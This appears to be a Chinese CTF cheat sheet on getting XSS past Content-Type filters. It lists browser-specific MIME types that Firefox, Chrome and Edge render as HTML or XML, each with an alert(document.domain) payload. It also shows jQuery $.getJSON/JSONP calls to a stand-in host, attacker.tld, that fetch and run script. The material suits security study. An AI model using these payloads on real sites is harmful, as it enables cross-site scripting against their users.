mime绕过
题目过滤了html xml xsl,且Content-Type必须包含/
Firefox
-
如果
Content-Type标头不包含/字符,Firefox会尝试猜测文件类型。 此外,X-Content-Type-Options:nosniff在这种情况下无效,因为Firefox仅在尝试连接<script src =>和<link rel ="stylesheet" href =>中具有错误内容类型的文件时才使用它。 -
text/rdf被处理为xmlContent-Type: text/rdf <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script> -
multipart/x-mixed-replace支持HTML(示例)
如果缺少nosniff,Edge会处理类似于常规HTML的类型。Content-Type: multipart/x-mixed-replace;boundary=xxx xxx Content-Type:text/html <script>alert(document.domain)</script> xxx-- -
*/*
此时Firefox会猜测文件类型,无视X-Content-Type-Options:nosniff -
text/plain;,text/html支持多种逗号分隔类型Content-Type: text/plain;,text/html <script>alert(document.domain)</script>
Chrome
-
text/xsl被处理为xmlContent-Type: text/xsl <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script> -
text/plain;,text/html支持多种逗号分隔类型Content-Type: text/plain;,text/html <script>alert(document.domain)</script>
Edge
text/vtt被处理为htmlContent-Type: text/vtt <script>alert(document.domain)</script>
JSONP实现跨域
If the URL includes the string "callback=?" (or similar, as defined by the server-side API), the request is treated as JSONP instead. See the discussion of the jsonp data type in $.ajax() for more details.
因此,如果我们可以控制传递给$.getJSON的URL,就可以XSS
callback的正则表达式更改:
> 1.7.2 /(=)?(?=&|$)|??/
<= 1.7.2 /(=)?(&|$)|??/i
<= 1.5.1 /(=)?(&|$)|()??()/i
<= 1.4.4 /=?(&|$)/
<= 1.4.2 /=?(&|$)/
<= 1.2.1 /=(?|%3F)/g
< 1.2 not supported
代码示例
$.ajax({url:'https://attacker.tld/??', dataType:'json'});
$.ajax({url:'https://attacker.tld/=?&', dataType:'json'});
$.getJSON('https://attacker.tld??');
$.getJSON('https://??.attacker.tld');
$.getJSON('https://xxx.com?callback??');最后会被解析成https://xxx.com/?callbackjQueryxxx&_=[timestamp],然后将获取到的数据作为js执行